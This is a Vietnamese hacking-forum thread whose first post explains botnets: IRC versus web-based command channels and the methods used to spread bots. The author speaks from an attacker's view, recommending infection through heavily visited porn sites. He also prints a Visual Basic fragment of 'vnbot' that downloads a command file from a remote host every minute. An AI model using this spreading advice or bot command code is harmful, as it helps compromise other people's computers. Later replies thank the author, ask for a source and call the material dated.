banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Kiến thức cơ bản về botnet  XML
  [Question]   Kiến thức cơ bản về botnet 24/09/2007 22:43:35 (+0700) | #1 | 86639
danvac
Member

[Minus]    0    [Plus]
Joined: 15/03/2007 18:53:59
Messages: 71
Offline
[Profile] [PM] [MSN]
smilie bài đầu tay có gì sơ suất xin được lượng thứ
Kiến thức cơ bản về botnet
Các chương ;
A – các định nghĩa
B- Phát tán bot như thế nào
C – Phân tích một bot
1, a,b,c định nghĩa :
A – Botnet là gì : là những chương trình tương tự Trojan backdoor cho phép kẻ tấn công sử dụng máy của họ như là những Zoombie ( máy tính thây ma – máy tính bị chiếm quyền điều khiển hoàn toàn ) v à chúng chủ động kết nối với một Server để dễ dàng điều khiển , các bạn lưu ý chữ “chủ động” đó là một đặc điểm khác của bot so với trojan backdoor . Chính vì sự chủ động này mà máy tính bị cài đặt chúng kết nối trở nên chậm chạp , một đặc điểm giúp ta dễ dàng nhận diện bot .

B – tại sao gọi là mạng botnet : mạng botnet là một mạng rất lớn gồm hàng trăm hàng ngàn máy tính Zombie kết nối với một máy chủ mIRC ( Internet Replay Chat )
hoặc qua các máy chủ DNS để nhận lệnh từ hacker một cách nhanh nhất . Các mạng bot gồm hàng ngàn “thành viên” là một công cụ lý tưởng cho các cuộc chiến tranh đọ máu như DDOS , spam, cài đặt các chương trình quảng cáo …..

C – mIRC hay DNS :
- mIRC là một hình thức chat có trước yahoo meseger trước đây thường được các botmaster sử dụng riêng tôi thì tôi thích sử dụng các bot chạy trên nền web hơn (
DNS - Domain Name Server ) - vì ngay cả khi ta online hay offline thì chúng vẫn hoạt động
– dễ dàng điều khiển phù hợp với điều kiện VN .

- Note :
trước đây do bot luôn có khả năng lây lan nên còn được gọi là BOTNET – WORM nhưng hiện nay chức năng này được gỡ bỏ vì hai lý do sau
+ Bot dễ bị lộ : Trong khi mục tiêu của botmaster là phục kích lâu dài
+ Kích thước của worm lớn dễ bị Fire Wall chặn dễ phát hiện khó lây lan , =>bot thường được tải xuống bởi 1 chú worm hoặc nguỵ trang bằng một trojan tuỳ theo trình độ , tư duy của botmaster .
=> Theo tôi worm và botnet nên tách rời nhau ra
B- Phát tán bot như thế nào
Các botmaster thường phát tán bot theo những cách như sau
1-Sử dụng một con worm tải bot xuống và kích hoạt chúng (ta đã biết là worm lây lan rất mạnh )
2- Gắn bot vào một trojan nói theo cách dễ hiểu nhất là gửi các chương trình bị lây nhiễm bởi bot cho các nạn nhân và tự họ sẽ kích hoạt chúng
3 - Gắn nó lên một trang web nhiều người truy câpj ( thường là các trang web sex :X vì số lượng người tham gia rất lớn )
4- Kết hợp các 1 với 2 hoặc 4 (gắn worm vào trojan hoặc web)
Chú ý : cách lây lan thứ 3 là hay nhất ( tuy có gian hung một chút )vì với cách thứ nhất là dung worm thì rất dễ bị lộ cách thứ 3 thì ko được nhiều , cách thứ 4 thì tạm được
C – Phân loại bot
- Theo cách điêur khỉên botnet được chia làm hai loại
+ DNS Bot : điều khiển qua nền web, nguyên tắc hoạt động như sau : đầu tiên tại host điều khiển botmaster sẽ tại một tệp lệnh.txt sau đó bot sẽ download tệp này, tiến hành phân tích và thực hiện yêu cấu của người viết.
-Ưu đỉêm : Thực hiện dễ dàng viết và điều khỉên đơn giản chỉ cần một host bất kỳ là có thể điều khiển được , bot thực hiện lệnh được công việc ngay cả khi chủ bot online hay offline .
-Nhược đỉêm : tốc độ xử lý chậm (do phải mất công cho cả download và upload ) – không có sự trao đổi qua lại giữa chủ bot và zombie .
+ mIRC : điều khiển qua các mạng chat mIRC : ta đã biết là tại hình thức chat Internet Replay Chat, một chương trình có thể tuỳ ý đăng ký và sử dụng một nick name mà không cần phải đăng ký , lợi dụng lỗ hổng này bot mIRC sử dụng chúng để hoạt đông .Nguyên tắc như sau : bot sẽ sử dụng winsock gửi các tệp lệnh IRC để nhận lệnh từ hacker qua một port đã định sẵn khi cấu hình bot cần lưu ý đến Chanel ( gọi tắt là Chan), Port (mặc đinh là 6667), máy chủ Mirc ( thường mở đầu bằng irc.)
- Các bạn có thể tham khảo vấn đề này kỹ hơn tại
www.ryan1918.com
trang web hang đầu về botnet .
D - Mổ xẻ một bot
Trong bài này vì kiến thức có hạn tôi sẽ chỉ phân tích 1 bot chạy trên nền web có tên là vnbot được viết bằng ngôn ngữ visual basic 6.0 để các bạn hiểu them

đầu tiên là phân tích hàm API sau

Khai báo :

Private Declare Function URLDownloadToFile Lib "urlmon" _
Alias "URLDownloadToFileA" ( _
ByVal pCaller As Long, _
ByVal szURL As String, _
ByVal szFileName As String, _
ByVal dwReserved As Long, _
ByVal lpfnCB As Long) As Long

Đây là một hàm API sử dụng thư viện hàm của windows

Xử dụng
‘tạ tạo một timer với tên mặc định là timer1 và thuộc tính interval là 60000 (tương đương ‘1 phút )
‘trong sự kiện timer nhập đoạn mã sau vào

Timer1_Timer ()
Call URLDownloadToFile(0&, “http://ww.hótban.com/host.txt”, “C:\test.txt”, &H10, 0&)
‘hàm này có tác dụng là download tệp lệnh về đoạn mã sau có tác dụng đọc chương trình ‘cần chạy

open “c:\test.txt” for input as #1 ‘ Mo theo che do chi doc – Tai cong là #1
line input #1, id ‘ Doc dong dau tien
msgbox id ‘ hien thi ket qua
close #1
‘đóng lại
End sub
‘Ket thuc
2 đoạn mã này có tác dụng đọc và hiển thị kết quả chúng ta mong muốn thông qua net .
[Up] [Print Copy]
  [Question]   Kiến thức cơ bản về botnet 04/11/2010 07:00:02 (+0700) | #2 | 224190
[Avatar]
snopteck
Member

[Minus]    0    [Plus]
Joined: 03/05/2009 19:42:19
Messages: 7
Offline
[Profile] [PM]
Cám ơn sư huynh ! Mặc dù bài này viết cách đây 3 năm rồi smilie nhưng giờ đệ mới đọc được, đệ đang cần present về cái này, may quá !
Keep trying to break free for that blue sky !
[Up] [Print Copy]
  [Question]   Kiến thức cơ bản về botnet 05/11/2010 16:13:50 (+0700) | #3 | 224311
[Avatar]
handaewoo
Member

[Minus]    0    [Plus]
Joined: 07/11/2009 19:10:38
Messages: 207
Location: Korea
Offline
[Profile] [PM] [Email]
đến khi nào mới hết mấy cái bài viết kiểu này. Nguồn ở đâu ghi hộ vào 1 cái .
Bi Kịch Antivirus Vietnam = BKAV
[Up] [Print Copy]
  [Question]   Kiến thức cơ bản về botnet 21/12/2010 09:17:14 (+0700) | #4 | 227512
[Avatar]
meocon_it
Member

[Minus]    0    [Plus]
Joined: 17/12/2010 14:42:55
Messages: 2
Offline
[Profile] [PM] [Email]
không biết smilie mà giờ đọc được thấy cũng hay hay!
thanks! smilie
Ước mơ của tôi...
[Up] [Print Copy]
  [Question]   Kiến thức cơ bản về botnet 15/01/2011 16:32:08 (+0700) | #5 | 229510
daigiaIQ_Y2.1K
Member

[Minus]    0    [Plus]
Joined: 18/01/2008 08:30:27
Messages: 60
Offline
[Profile] [PM]
Cái này bây giờ " xưa như diễm " rôi bạn ơi .
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|